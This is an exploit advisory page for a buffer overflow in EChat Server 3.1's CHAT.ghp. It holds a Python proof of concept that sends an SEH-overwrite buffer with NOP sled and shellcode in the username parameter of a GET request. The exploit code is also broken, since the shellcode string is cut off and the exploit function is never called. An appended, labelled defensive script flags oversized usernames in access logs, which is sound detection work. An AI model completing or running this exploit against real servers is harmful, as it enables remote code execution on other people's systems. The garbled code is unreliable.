EChat Server 3.1 CHAT.ghp Buffer Overflow

EChat Server version 3.1 suffers from a buffer overflow vulnerability in CHAT.ghp.

MD5 | e8de314cc62dfc852d982ec99b634622

# Exploit Author: Juan Sacco <[email protected]>
# Vulnerability found using Exploit Pack v10 -
# Impact:
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
# Program description:
# Easy Chat Server is an easy, fast and affordable way to host and
# manage your own real-time communication software,
# it allows friends/colleagues to chat with you through a Web Browser
# (IE, Safari, Chrome, Opera etc.)
# Vendor page:

import string, sys
import socket, httplib
import struct

def exploit():
    try:
        junk = '\x41' * 217
        shortjmp = "\xeb\x08\xcc\xcc" # Jump over SEH
        seh = struct.pack('<L', 0x100154c5) # ADD ESP,2C # POP ESI # ADD
        buffersize = 2775
        nops = "\x90"
        # debug = "\xcc\xcc\xcc\xcc"
        shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
        buffer = junk + shortjmp + seh + nops * (buffersize - (len(shellcode))) + shellcode
        print buffer
        URL = '/chat.ghp?username=' + buffer + '&password=null&room=1&null=2'
        conn = httplib.HTTPConnection(host, port)
        conn.request('GET', URL)
    except Exception as Error:
        print "[!] Something went wrong!"
        print Error

def howtousage():
    print "[!] Sorry, minimum required arguments: [host] [port]"

if __name__ == '__main__':
    print "[*] EChat Server v3.1 CHAT.ghp (UserName)"
    print "[*] Author: Juan Sacco <[email protected]>"

    try:
        host = sys.argv[1]
        port = sys.argv[2]
    except IndexError:
        howtousage()
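
A defensive check for the request this PoC sends (a GET to /chat.ghp with an oversized username parameter), added here as an example that is not part of the original exploit: it scans web or proxy access-log lines and flags usernames that are overlong or carry non-printable bytes. The 64-byte limit, the Common Log Format input and the function names are assumptions, and the sample lines are constructed.

```python
import re

# Assumption: usernames longer than this are never legitimate on this server.
MAX_USERNAME_LEN = 64
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
# A byte logged as %XX (URL encoding) or \xXX (proxy log escaping).
ESCAPED_BYTE = re.compile(r'%([0-9A-Fa-f]{2})|\\x([0-9A-Fa-f]{2})')

def username_value(target):
    """Return the raw username value of a /chat.ghp request, else None."""
    path, _, query = target.partition("?")
    if path.lower() != "/chat.ghp":
        return None
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "username":
            return value
    return None

def measure(value):
    """Return (length in bytes, True if any escaped byte is non-printable)."""
    escaped = [int(a or b, 16) for a, b in ESCAPED_BYTE.findall(value)]
    length = len(ESCAPED_BYTE.sub("?", value))
    return length, any(b < 0x20 or b > 0x7E for b in escaped)

def flag_line(line):
    """Return a list of reasons the log line is suspicious, or None."""
    match = REQUEST_RE.search(line)
    value = username_value(match.group(1)) if match else None
    if value is None:
        return None
    length, binary = measure(value)
    reasons = []
    if length > MAX_USERNAME_LEN:
        reasons.append("username length %d" % length)
    if binary:
        reasons.append("non-printable bytes in username")
    return reasons or None

# Constructed sample log lines (Common Log Format), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /chat.ghp?username=alice&password=x&room=1&null=2 HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /chat.ghp?username=' + "A" * 300 + '&password=null&room=1&null=2 HTTP/1.1" 200 0',
    '192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /chat.ghp?username=bob\\x90\\x90%eb&password=null&room=1 HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.htm HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(flag_line(entry), entry[:70])
```

The PoC places 217 filler bytes before the SEH record, so a length limit well below that catches the overflow attempt regardless of the payload that follows.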
